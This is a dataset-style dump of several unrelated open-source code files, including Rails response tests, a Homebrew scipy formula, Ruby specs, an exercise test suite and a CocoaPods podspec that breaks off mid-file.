hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e956bd6eb1a50ad14c8e892d589abd7fd39e6e1b | 955 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require "rspec"
RSpec.describe "Google::Apis::BigqueryreservationV1" do
# Minimal test just to ensure no syntax errors in generated code
it "should load" do
expect do
require "google/apis/bigqueryreservation_v1"
end.not_to raise_error
expect do
Google::Apis::BigqueryreservationV1::BigQueryReservationService.new
end.not_to raise_error
end
end
| 34.107143 | 74 | 0.757068 |
ab55ba580ebc78b17ab2f83a5c077101c0466fa5 | 374 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::IotHub::Mgmt::V2018_01_22
module Models
#
# Defines values for IotHubScaleType
#
module IotHubScaleType
Automatic = "Automatic"
Manual = "Manual"
None = "None"
end
end
end
| 22 | 70 | 0.684492 |
acdd41b559272aaabad4b8ac58f911195693f9f1 | 93 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'passenger_memory_status'
| 31 | 58 | 0.774194 |
d539a9525f6871d3f0a5df04cf4f92669e0f5b9d | 2,330 | # -*- coding:utf-8; mode:ruby; -*-
require 'rbindkeys'
require 'revdev'
include Rbindkeys
describe CLI do
describe '#.main' do
context ', when ARGV is empty,' do
before do
@args = []
end
it 'shoud exit with code 1' do
expect { CLI::main @args }.to raise_error do |e|
expect(e).to be_a SystemExit
expect(e.status).to eq 1
end
end
end
context ', when ARGV have an argument,' do
before do
@args = ['foo']
@observer = double Observer
expect(Observer).to receive(:new) { @observer }
expect(@observer).to receive(:start) { nil }
end
it 'should call Observer#new#start' do
config = CLI::config
CLI::main @args
expect(CLI::config).to eq config
end
end
context ', when ARGV have an invalid option (--config),' do
before do
@args = ['--config']
end
it 'should exit with code 1' do
expect { CLI::main @args }.to raise_error do |e|
expect(e).to be_a SystemExit
expect(e.status).to eq 1
end
end
end
context ', when ARGV have an option (--config) and an event device,' do
before do
@config = 'a_config_file'
@args = ['--config', @config, 'foodev']
@observer = double Observer
expect(Observer).to receive(:new) { @observer }
expect(@observer).to receive(:start) { nil }
end
it 'should call Observer#new#start ' do
CLI::main @args
expect(CLI::config).to eq @config
end
end
context ', when ARGV have an option (--evdev-list),' do
before do
@args = ['--evdev-list']
@evdev = double Revdev::EventDevice
@id = double Object
allow(@evdev).to receive(:device_name) { "foo" }
allow(@evdev).to receive(:device_id) { @id }
allow(@id).to receive(:hr_bustype) { 'bar' }
allow(Revdev::EventDevice).to receive(:new) { @evdev }
expect(Dir).to receive(:glob).with(CLI::EVDEVS)
.and_return(['/dev/input/event4',
'/dev/input/event2',
'/dev/input/event13'])
end
it 'should pring device info' do
CLI::main @args
end
end
end
end
| 29.871795 | 75 | 0.540343 |
ffd1bdbfbbe6d6c799580d73736678395a2cc090 | 819 | require 'opbeat/filter'
module Opbeat
module DataBuilders
class Error < DataBuilder
def build error_message
h = {
message: error_message.message,
timestamp: error_message.timestamp,
level: error_message.level,
logger: error_message.logger,
culprit: error_message.culprit,
machine: error_message.machine,
extra: error_message.extra,
param_message: error_message.param_message
}
h[:exception] = error_message.exception.to_h if error_message.exception
h[:stacktrace] = error_message.stacktrace.to_h if error_message.stacktrace
h[:http] = error_message.http.to_h if error_message.http
h[:user] = error_message.user.to_h if error_message.user
h
end
end
end
end
| 29.25 | 82 | 0.659341 |
ac3b77a42c8e3e092845d77814ebc8d481e19a69 | 143 | class AddJourneysCountToCategories < ActiveRecord::Migration[6.1]
def change
add_column :categories, :journeys_count, :integer
end
end
| 23.833333 | 65 | 0.783217 |
ed64d899029b0182740fa221c4cabc0d2dcd381a | 19,557 | # frozen_string_literal: true
require "abstract_unit"
require "timeout"
require "rack/content_length"
class ResponseTest < ActiveSupport::TestCase
def setup
@response = ActionDispatch::Response.create
@response.request = ActionDispatch::Request.empty
end
def test_can_wait_until_commit
t = Thread.new {
@response.await_commit
}
@response.commit!
assert_predicate @response, :committed?
assert t.join(0.5)
end
def test_stream_close
@response.stream.close
assert_predicate @response.stream, :closed?
end
def test_stream_write
@response.stream.write "foo"
@response.stream.close
assert_equal "foo", @response.body
end
def test_write_after_close
@response.stream.close
e = assert_raises(IOError) do
@response.stream.write "omg"
end
assert_equal "closed stream", e.message
end
def test_each_isnt_called_if_str_body_is_written
# Controller writes and reads response body
each_counter = 0
@response.body = Object.new.tap { |o| o.singleton_class.define_method(:each) { |&block| each_counter += 1; block.call "foo" } }
@response["X-Foo"] = @response.body
assert_equal 1, each_counter, "#each was not called once"
# Build response
status, headers, body = @response.to_a
assert_equal 200, status
assert_equal "foo", headers["X-Foo"]
assert_equal "foo", body.each.to_a.join
# Show that #each was not called twice
assert_equal 1, each_counter, "#each was not called once"
end
def test_set_header_after_read_body_during_action
@response.body
# set header after the action reads back @response.body
@response["x-header"] = "Best of all possible worlds."
# the response can be built.
status, headers, body = @response.to_a
assert_equal 200, status
assert_equal "", body.body
assert_equal "Best of all possible worlds.", headers["x-header"]
end
def test_read_body_during_action
@response.body = "Hello, World!"
# even though there's no explicitly set content-type,
assert_nil @response.content_type
# after the action reads back @response.body,
assert_equal "Hello, World!", @response.body
# the response can be built.
status, headers, body = @response.to_a
assert_equal 200, status
assert_equal({
"Content-Type" => "text/html; charset=utf-8"
}, headers)
parts = []
body.each { |part| parts << part }
assert_equal ["Hello, World!"], parts
end
def test_response_body_encoding
body = ["hello".encode(Encoding::UTF_8)]
response = ActionDispatch::Response.new 200, {}, body
response.request = ActionDispatch::Request.empty
assert_equal Encoding::UTF_8, response.body.encoding
end
def test_response_charset_writer
@response.charset = "utf-16"
assert_equal "utf-16", @response.charset
@response.charset = nil
assert_equal "utf-8", @response.charset
end
def test_setting_content_type_header_impacts_content_type_method
@response.headers["Content-Type"] = "application/aaron"
assert_equal "application/aaron", @response.content_type
end
def test_empty_content_type_returns_nil
@response.headers["Content-Type"] = ""
assert_nil @response.content_type
end
test "simple output" do
@response.body = "Hello, World!"
status, headers, body = @response.to_a
assert_equal 200, status
assert_equal({
"Content-Type" => "text/html; charset=utf-8"
}, headers)
parts = []
body.each { |part| parts << part }
assert_equal ["Hello, World!"], parts
end
test "status handled properly in initialize" do
assert_equal 200, ActionDispatch::Response.new("200 OK").status
end
def test_only_set_charset_still_defaults_to_text_html
response = ActionDispatch::Response.new
response.charset = "utf-16"
_, headers, _ = response.to_a
assert_equal "text/html; charset=utf-16", headers["Content-Type"]
end
test "utf8 output" do
@response.body = [1090, 1077, 1089, 1090].pack("U*")
status, headers, _ = @response.to_a
assert_equal 200, status
assert_equal({
"Content-Type" => "text/html; charset=utf-8"
}, headers)
end
test "content length" do
[100, 101, 102, 204].each do |c|
@response = ActionDispatch::Response.new
@response.status = c.to_s
@response.set_header "Content-Length", "0"
_, headers, _ = @response.to_a
assert_not headers.has_key?("Content-Length"), "#{c} must not have a Content-Length header field"
end
end
test "does not contain a message-body" do
[100, 101, 102, 204, 304].each do |c|
@response = ActionDispatch::Response.new
@response.status = c.to_s
@response.body = "Body must not be included"
_, _, body = @response.to_a
assert_empty body, "#{c} must not have a message-body but actually contains #{body}"
end
end
test "content type" do
[204, 304].each do |c|
@response = ActionDispatch::Response.new
@response.status = c.to_s
_, headers, _ = @response.to_a
assert_not headers.has_key?("Content-Type"), "#{c} should not have Content-Type header"
end
[200, 302, 404, 500].each do |c|
@response = ActionDispatch::Response.new
@response.status = c.to_s
_, headers, _ = @response.to_a
assert headers.has_key?("Content-Type"), "#{c} did not have Content-Type header"
end
end
test "does not include Status header" do
@response.status = "200 OK"
_, headers, _ = @response.to_a
assert_not headers.has_key?("Status")
end
test "response code" do
@response.status = "200 OK"
assert_equal 200, @response.response_code
@response.status = "200"
assert_equal 200, @response.response_code
@response.status = 200
assert_equal 200, @response.response_code
end
test "code" do
@response.status = "200 OK"
assert_equal "200", @response.code
@response.status = "200"
assert_equal "200", @response.code
@response.status = 200
assert_equal "200", @response.code
end
test "message" do
@response.status = "200 OK"
assert_equal "OK", @response.message
@response.status = "200"
assert_equal "OK", @response.message
@response.status = 200
assert_equal "OK", @response.message
end
test "cookies" do
@response.set_cookie("user_name", value: "david", path: "/")
_status, headers, _body = @response.to_a
assert_equal "user_name=david; path=/", headers["Set-Cookie"]
assert_equal({ "user_name" => "david" }, @response.cookies)
end
test "multiple cookies" do
@response.set_cookie("user_name", value: "david", path: "/")
@response.set_cookie("login", value: "foo&bar", path: "/", expires: Time.utc(2005, 10, 10, 5))
_status, headers, _body = @response.to_a
assert_equal "user_name=david; path=/\nlogin=foo%26bar; path=/; expires=Mon, 10 Oct 2005 05:00:00 -0000", headers["Set-Cookie"]
assert_equal({ "login" => "foo&bar", "user_name" => "david" }, @response.cookies)
end
test "delete cookies" do
@response.set_cookie("user_name", value: "david", path: "/")
@response.set_cookie("login", value: "foo&bar", path: "/", expires: Time.utc(2005, 10, 10, 5))
@response.delete_cookie("login")
assert_equal({ "user_name" => "david", "login" => nil }, @response.cookies)
end
test "read ETag and Cache-Control" do
resp = ActionDispatch::Response.new.tap { |response|
response.cache_control[:public] = true
response.etag = "123"
response.body = "Hello"
}
resp.to_a
assert_predicate resp, :etag?
assert_predicate resp, :weak_etag?
assert_not_predicate resp, :strong_etag?
assert_equal('W/"202cb962ac59075b964b07152d234b70"', resp.etag)
assert_equal({ public: true }, resp.cache_control)
assert_equal("public", resp.headers["Cache-Control"])
assert_equal('W/"202cb962ac59075b964b07152d234b70"', resp.headers["ETag"])
end
test "read strong ETag" do
resp = ActionDispatch::Response.new.tap { |response|
response.cache_control[:public] = true
response.strong_etag = "123"
response.body = "Hello"
}
resp.to_a
assert_predicate resp, :etag?
assert_not_predicate resp, :weak_etag?
assert_predicate resp, :strong_etag?
assert_equal('"202cb962ac59075b964b07152d234b70"', resp.etag)
end
test "read charset and content type" do
resp = ActionDispatch::Response.new.tap { |response|
response.charset = "utf-16"
response.content_type = Mime[:xml]
response.body = "Hello"
}
resp.to_a
assert_equal("utf-16", resp.charset)
assert_equal(Mime[:xml], resp.media_type)
assert_equal("application/xml; charset=utf-16", resp.content_type)
assert_equal("application/xml; charset=utf-16", resp.headers["Content-Type"])
end
test "read content type with default charset utf-8" do
resp = ActionDispatch::Response.new(200, "Content-Type" => "text/xml")
assert_equal("utf-8", resp.charset)
end
test "read content type with charset utf-16" do
original = ActionDispatch::Response.default_charset
begin
ActionDispatch::Response.default_charset = "utf-16"
resp = ActionDispatch::Response.new(200, "Content-Type" => "text/xml")
assert_equal("utf-16", resp.charset)
ensure
ActionDispatch::Response.default_charset = original
end
end
test "read x_frame_options, x_content_type_options, x_xss_protection, x_download_options and x_permitted_cross_domain_policies, referrer_policy" do
original_default_headers = ActionDispatch::Response.default_headers
begin
ActionDispatch::Response.default_headers = {
"X-Frame-Options" => "DENY",
"X-Content-Type-Options" => "nosniff",
"X-XSS-Protection" => "1;",
"X-Download-Options" => "noopen",
"X-Permitted-Cross-Domain-Policies" => "none",
"Referrer-Policy" => "strict-origin-when-cross-origin"
}
resp = ActionDispatch::Response.create.tap { |response|
response.body = "Hello"
}
resp.to_a
assert_equal("DENY", resp.headers["X-Frame-Options"])
assert_equal("nosniff", resp.headers["X-Content-Type-Options"])
assert_equal("1;", resp.headers["X-XSS-Protection"])
assert_equal("noopen", resp.headers["X-Download-Options"])
assert_equal("none", resp.headers["X-Permitted-Cross-Domain-Policies"])
assert_equal("strict-origin-when-cross-origin", resp.headers["Referrer-Policy"])
ensure
ActionDispatch::Response.default_headers = original_default_headers
end
end
test "read custom default_header" do
original_default_headers = ActionDispatch::Response.default_headers
begin
ActionDispatch::Response.default_headers = {
"X-XX-XXXX" => "Here is my phone number"
}
resp = ActionDispatch::Response.create.tap { |response|
response.body = "Hello"
}
resp.to_a
assert_equal("Here is my phone number", resp.headers["X-XX-XXXX"])
ensure
ActionDispatch::Response.default_headers = original_default_headers
end
end
test "respond_to? accepts include_private" do
assert_not_respond_to @response, :method_missing
assert @response.respond_to?(:method_missing, true)
end
test "can be explicitly destructured into status, headers and an enumerable body" do
response = ActionDispatch::Response.new(404, { "Content-Type" => "text/plain" }, ["Not Found"])
response.request = ActionDispatch::Request.empty
status, headers, body = *response
assert_equal 404, status
assert_equal({ "Content-Type" => "text/plain" }, headers)
assert_equal ["Not Found"], body.each.to_a
end
test "[response.to_a].flatten does not recurse infinitely" do
Timeout.timeout(1) do # use a timeout to prevent it stalling indefinitely
status, headers, body = [@response.to_a].flatten
assert_equal @response.status, status
assert_equal @response.headers, headers
assert_equal @response.body, body.each.to_a.join
end
end
test "compatibility with Rack::ContentLength" do
@response.body = "Hello"
app = lambda { |env| @response.to_a }
env = Rack::MockRequest.env_for("/")
_status, headers, _body = app.call(env)
assert_nil headers["Content-Length"]
_status, headers, _body = Rack::ContentLength.new(app).call(env)
assert_equal "5", headers["Content-Length"]
end
end
class ResponseHeadersTest < ActiveSupport::TestCase
def setup
@response = ActionDispatch::Response.create
@response.set_header "Foo", "1"
end
test "has_header?" do
assert @response.has_header? "Foo"
assert_not @response.has_header? "foo"
assert_not @response.has_header? nil
end
test "get_header" do
assert_equal "1", @response.get_header("Foo")
assert_nil @response.get_header("foo")
assert_nil @response.get_header(nil)
end
test "set_header" do
assert_equal "2", @response.set_header("Foo", "2")
assert @response.has_header?("Foo")
assert_equal "2", @response.get_header("Foo")
assert_nil @response.set_header("Foo", nil)
assert @response.has_header?("Foo")
assert_nil @response.get_header("Foo")
end
test "delete_header" do
assert_nil @response.delete_header(nil)
assert_nil @response.delete_header("foo")
assert @response.has_header?("Foo")
assert_equal "1", @response.delete_header("Foo")
assert_not @response.has_header?("Foo")
end
test "add_header" do
# Add a value to an existing header
assert_equal "1,2", @response.add_header("Foo", "2")
assert_equal "1,2", @response.get_header("Foo")
# Add nil to an existing header
assert_equal "1,2", @response.add_header("Foo", nil)
assert_equal "1,2", @response.get_header("Foo")
# Add nil to a nonexistent header
assert_nil @response.add_header("Bar", nil)
assert_not @response.has_header?("Bar")
assert_nil @response.get_header("Bar")
# Add a value to a nonexistent header
assert_equal "1", @response.add_header("Bar", "1")
assert @response.has_header?("Bar")
assert_equal "1", @response.get_header("Bar")
end
end
class ResponseIntegrationTest < ActionDispatch::IntegrationTest
test "response cache control from railsish app" do
@app = lambda { |env|
ActionDispatch::Response.new.tap { |resp|
resp.cache_control[:public] = true
resp.etag = "123"
resp.body = "Hello"
resp.request = ActionDispatch::Request.empty
}.to_a
}
get "/"
assert_response :success
assert_equal("public", @response.headers["Cache-Control"])
assert_equal('W/"202cb962ac59075b964b07152d234b70"', @response.headers["ETag"])
assert_equal('W/"202cb962ac59075b964b07152d234b70"', @response.etag)
assert_equal({ public: true }, @response.cache_control)
end
test "response cache control from rackish app" do
@app = lambda { |env|
[200,
{ "ETag" => 'W/"202cb962ac59075b964b07152d234b70"',
"Cache-Control" => "public" }, ["Hello"]]
}
get "/"
assert_response :success
assert_equal("public", @response.headers["Cache-Control"])
assert_equal('W/"202cb962ac59075b964b07152d234b70"', @response.headers["ETag"])
assert_equal('W/"202cb962ac59075b964b07152d234b70"', @response.etag)
assert_equal({ public: true }, @response.cache_control)
end
test "response charset and content type from railsish app" do
@app = lambda { |env|
ActionDispatch::Response.new.tap { |resp|
resp.charset = "utf-16"
resp.content_type = Mime[:xml]
resp.body = "Hello"
resp.request = ActionDispatch::Request.empty
}.to_a
}
get "/"
assert_response :success
assert_equal("utf-16", @response.charset)
assert_equal(Mime[:xml], @response.media_type)
assert_equal("application/xml; charset=utf-16", @response.content_type)
assert_equal("application/xml; charset=utf-16", @response.headers["Content-Type"])
end
test "response charset and content type from rackish app" do
@app = lambda { |env|
[200,
{ "Content-Type" => "application/xml; charset=utf-16" },
["Hello"]]
}
get "/"
assert_response :success
assert_equal("utf-16", @response.charset)
assert_equal(Mime[:xml], @response.media_type)
assert_equal("application/xml; charset=utf-16", @response.content_type)
assert_equal("application/xml; charset=utf-16", @response.headers["Content-Type"])
end
test "strong ETag validator" do
@app = lambda { |env|
ActionDispatch::Response.new.tap { |resp|
resp.strong_etag = "123"
resp.body = "Hello"
resp.request = ActionDispatch::Request.empty
}.to_a
}
get "/"
assert_response :ok
assert_equal('"202cb962ac59075b964b07152d234b70"', @response.headers["ETag"])
assert_equal('"202cb962ac59075b964b07152d234b70"', @response.etag)
end
test "response Content-Type with optional parameters" do
@app = lambda { |env|
[
200,
{ "Content-Type" => "text/csv; charset=utf-16; header=present" },
["Hello"]
]
}
get "/"
assert_response :success
assert_equal("text/csv; charset=utf-16; header=present", @response.headers["Content-Type"])
assert_equal("text/csv; charset=utf-16; header=present", @response.content_type)
assert_equal("text/csv", @response.media_type)
assert_equal("utf-16", @response.charset)
end
test "response Content-Type with optional parameters that set before charset" do
@app = lambda { |env|
[
200,
{ "Content-Type" => "text/csv; header=present; charset=utf-16" },
["Hello"]
]
}
get "/"
assert_response :success
assert_equal("text/csv; header=present; charset=utf-16", @response.headers["Content-Type"])
assert_equal("text/csv; header=present; charset=utf-16", @response.content_type)
assert_equal("text/csv", @response.media_type)
assert_equal("utf-16", @response.charset)
end
test "response Content-Type with quoted-string" do
@app = lambda { |env|
[
200,
{ "Content-Type" => 'text/csv; header=present; charset="utf-16"' },
["Hello"]
]
}
get "/"
assert_response :success
assert_equal('text/csv; header=present; charset="utf-16"', @response.headers["Content-Type"])
assert_equal('text/csv; header=present; charset="utf-16"', @response.content_type)
assert_equal("text/csv", @response.media_type)
assert_equal("utf-16", @response.charset)
end
test "`content type` returns header that excludes `charset` when specified `return_only_media_type_on_content_type`" do
original = ActionDispatch::Response.return_only_media_type_on_content_type
ActionDispatch::Response.return_only_media_type_on_content_type = true
@app = lambda { |env|
if env["PATH_INFO"] == "/with_parameters"
[200, { "Content-Type" => "text/csv; header=present; charset=utf-16" }, [""]]
else
[200, { "Content-Type" => "text/csv; charset=utf-16" }, [""]]
end
}
get "/"
assert_response :success
assert_deprecated do
assert_equal("text/csv", @response.content_type)
end
get "/with_parameters"
assert_response :success
assert_deprecated do
assert_equal("text/csv; header=present", @response.content_type)
end
ensure
ActionDispatch::Response.return_only_media_type_on_content_type = original
end
end
| 31.241214 | 149 | 0.674234 |
03ebb22c15072e5bd550d60c23f993ad52ebacde | 1,001 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended to check this file into your version control system.
ActiveRecord::Schema.define(:version => 20110424190739) do
create_table "users", :force => true do |t|
t.string "username"
t.string "email"
t.string "password_hash"
t.string "password_salt"
t.datetime "created_at"
t.datetime "updated_at"
end
end
| 40.04 | 86 | 0.754246 |
ab3cb45dcd1e7dd875a3d5382ad24520fa55b5fa | 1,027 | require_relative '../../pipe/http'
numpipes = 500
count = 0
unless ENV['COUNT'].nil?
count = ENV['COUNT'].to_i
end
persec = 1
unless ENV['PER_SECOND'].nil?
persec = ENV['PER_SECOND'].to_f
end
puts "#{persec}: #{count}"
mux = Mutex.new
buffer = Queue.new
donebuffer = Queue.new
threads = []
# threads << Thread.new do
# st = Time.now
# count = 0
# while true
# if donebuffer.length == 0
# sleep(1)
# next
# end
# donebuffer.deq
# count += 1
# if count % 100 == 0
# elapsed = Time.now - st
# puts "(#{count}) #{count.to_f / elapsed} per sec"
# end
# end
# end
numpipes.times do
threads << Thread.new do
pipe = HTTPPipe.new(apikey: ENV['PIPELINR_API_KEY'], pipe: 'testpipe-ruby')
while true do
donebuffer << pipe.send(buffer.deq)
end
end
end
timestep = 1.0/persec.to_f
i = 0
while (count == 0 || i < count) do
i+=1
buffer << ({
route: ['route'],
payload: %Q{{"index":#{i}}}
})
sleep timestep
end
threads.each{|t| t.join} | 16.836066 | 79 | 0.584226 |
338e97200b0333e4a7d0f7b0916ac98a8552cf54 | 235 | module Rubicus; end
$:.unshift(File.dirname(__FILE__)) unless
$:.include?(File.dirname(__FILE__)) || $:.include?(File.expand_path(File.dirname(__FILE__)))
require 'rubicus/version'
require 'rubicus/graph'
require 'rubicus/layers' | 29.375 | 94 | 0.744681 |
282e794c78cc656d3b910709363271a36286bc37 | 235 | require File.dirname(__FILE__) + '/../../spec_helper'
require File.dirname(__FILE__) + '/fixtures/classes'
require File.dirname(__FILE__) + '/shared/replace'
describe "Array#replace" do
it_behaves_like(:array_replace, :replace)
end
| 29.375 | 53 | 0.753191 |
1dd830c4e5d980e674e8e4eb0b796734cca0a9d2 | 2,845 | class Scipy < Formula
desc "Software for mathematics, science, and engineering"
homepage "https://www.scipy.org"
url "https://files.pythonhosted.org/packages/b4/a2/4faa34bf0cdbefd5c706625f1234987795f368eb4e97bde9d6f46860843e/scipy-1.8.0.tar.gz"
sha256 "31d4f2d6b724bc9a98e527b5849b8a7e589bf1ea630c33aa563eda912c9ff0bd"
license "BSD-3-Clause"
head "https://github.com/scipy/scipy.git", branch: "master"
bottle do
sha256 cellar: :any, arm64_monterey: "2818d2eecf3d9126d53cc3629b5e06227a0ea7ea5a4a845d3dc1b81d0180b0d7"
sha256 cellar: :any, arm64_big_sur: "89d3d3b52108ace1c4a19671ec7b7e1bff59ae4472370b767411624f374e357d"
sha256 cellar: :any, monterey: "caf9212be80e0ff32f309c3dbad8861b307a8bdc0e980599eed2f408bf531c28"
sha256 cellar: :any, big_sur: "ae3e8196537deaf9739880873b9fe859c84229929f111a834a0ab951166d440d"
sha256 cellar: :any, catalina: "5e74dcfd26730a916093f9b18dee1b1bd1a6d58d52790839c4efe2f35c452ea1"
sha256 x86_64_linux: "b953884a721170689cec7207e3e416606a030a1e61542a83502dd643b086cc45"
end
depends_on "cython" => :build
depends_on "pythran" => :build
depends_on "swig" => :build
depends_on "gcc" # for gfortran
depends_on "numpy"
depends_on "openblas"
depends_on "pybind11"
depends_on "[email protected]"
cxxstdlib_check :skip
fails_with gcc: "5"
def install
openblas = Formula["openblas"].opt_prefix
ENV["ATLAS"] = "None" # avoid linking against Accelerate.framework
ENV["BLAS"] = ENV["LAPACK"] = "#{openblas}/lib/#{shared_library("libopenblas")}"
config = <<~EOS
[DEFAULT]
library_dirs = #{HOMEBREW_PREFIX}/lib
include_dirs = #{HOMEBREW_PREFIX}/include
[openblas]
libraries = openblas
library_dirs = #{openblas}/lib
include_dirs = #{openblas}/include
EOS
Pathname("site.cfg").write config
site_packages = Language::Python.site_packages("python3")
ENV.prepend_create_path "PYTHONPATH", Formula["cython"].opt_libexec/site_packages
ENV.prepend_create_path "PYTHONPATH", Formula["pythran"].opt_libexec/site_packages
ENV.prepend_create_path "PYTHONPATH", Formula["numpy"].opt_prefix/site_packages
ENV.prepend_create_path "PYTHONPATH", site_packages
system Formula["[email protected]"].opt_bin/"python3", "setup.py", "build",
"--fcompiler=gfortran", "--parallel=#{ENV.make_jobs}"
system Formula["[email protected]"].opt_bin/"python3", *Language::Python.setup_install_args(prefix)
end
# cleanup leftover .pyc files from previous installs which can cause problems
# see https://github.com/Homebrew/homebrew-python/issues/185#issuecomment-67534979
def post_install
rm_f Dir["#{HOMEBREW_PREFIX}/lib/python*.*/site-packages/scipy/**/*.pyc"]
end
test do
system Formula["[email protected]"].opt_bin/"python3", "-c", "import scipy"
end
end
| 41.231884 | 133 | 0.739543 |
f7753cbb8362869df5201ea2bd642e3583d49dbd | 1,620 | require 'rails/commands/commands_tasks'
module Rails
class Command #:nodoc:
attr_reader :argv
def initialize(argv = [])
@argv = argv
@option_parser = build_option_parser
@options = {}
end
def self.run(task_name, argv)
command_name = command_name_for(task_name)
if command = command_for(command_name)
command.new(argv).run(command_name)
else
Rails::CommandsTasks.new(argv).run_command!(task_name)
end
end
def run(command_name)
parse_options_for(command_name)
@option_parser.parse! @argv
public_send(command_name)
end
def self.options_for(command_name, &options_to_parse)
@@command_options[command_name] = options_to_parse
end
def self.set_banner(command_name, banner)
options_for(command_name) { |opts, _| opts.banner = banner }
end
private
@@commands = []
@@command_options = {}
def parse_options_for(command_name)
@@command_options.fetch(command_name, proc {}).call(@option_parser, @options)
end
def build_option_parser
OptionParser.new do |opts|
opts.on('-h', '--help', 'Show this help.') do
puts opts
exit
end
end
end
def self.inherited(command)
@@commands << command
end
def self.command_name_for(task_name)
task_name.gsub(':', '_').to_sym
end
def self.command_for(command_name)
@@commands.find do |command|
command.public_instance_methods.include?(command_name)
end
end
end
end
| 22.816901 | 85 | 0.624074 |
01c2995d449e27d27be3a0423a2323b8c543c9d2 | 1,351 | require 'minitest/autorun'
require_relative 'roman_numerals'
# Common test data version: 1.0.0 070e8d5
class RomanNumeralsTest < Minitest::Test
def test_1
# skip
assert_equal 'I', 1.to_roman
end
def test_2
skip
assert_equal 'II', 2.to_roman
end
def test_3
skip
assert_equal 'III', 3.to_roman
end
def test_4
skip
assert_equal 'IV', 4.to_roman
end
def test_5
skip
assert_equal 'V', 5.to_roman
end
def test_6
skip
assert_equal 'VI', 6.to_roman
end
def test_9
skip
assert_equal 'IX', 9.to_roman
end
def test_27
skip
assert_equal 'XXVII', 27.to_roman
end
def test_48
skip
assert_equal 'XLVIII', 48.to_roman
end
def test_59
skip
assert_equal 'LIX', 59.to_roman
end
def test_93
skip
assert_equal 'XCIII', 93.to_roman
end
def test_141
skip
assert_equal 'CXLI', 141.to_roman
end
def test_163
skip
assert_equal 'CLXIII', 163.to_roman
end
def test_402
skip
assert_equal 'CDII', 402.to_roman
end
def test_575
skip
assert_equal 'DLXXV', 575.to_roman
end
def test_911
skip
assert_equal 'CMXI', 911.to_roman
end
def test_1024
skip
assert_equal 'MXXIV', 1024.to_roman
end
def test_3000
skip
assert_equal 'MMM', 3000.to_roman
end
end
| 14.072917 | 41 | 0.658031 |
b9c0966414000d5b5319d88296401ccd69d63eb5 | 11 | replicas 1
| 5.5 | 10 | 0.818182 |
1cfe87175455164e39520c14cb493b87c270168a | 5,094 | #
# Be sure to run `pod spec lint ReduxSwift.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
s.name = "redux-swift"
s.version = "0.1.1"
s.summary = "A basic implementation of Redux state-management in Swift"
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
A basic implementation of Redux state-management in Swift. Additionally has first-class support for thunks (async actions)
DESC
s.homepage = "https://github.com/andyksaw/ReduxSwift"
# s.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Licensing your code is important. See http://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
# s.license = "MIT"
s.license = { :type => "MIT", :file => "LICENSE.md" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
s.author = "andyksaw"
# s.social_media_url = "http://twitter.com/andyksaw"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
s.platform = :ios, "8.0"
# s.platform = :ios, "5.0"
s.swift_version = '4.0'
# When using multiple platforms
# s.ios.deployment_target = "5.0"
# s.osx.deployment_target = "10.7"
# s.watchos.deployment_target = "2.0"
# s.tvos.deployment_target = "9.0"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
s.source = { :git => "https://github.com/andyksaw/ReduxSwift.git", :tag => "#{s.version}" }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any swift, h, m, mm, c & cpp files.
# For header files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
s.source_files = "ReduxSwift/**/*.{h,swift}"
s.exclude_files = "Classes/Exclude"
# s.public_header_files = "Classes/**/*.h"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# s.resource = "icon.png"
# s.resources = "Resources/*.png"
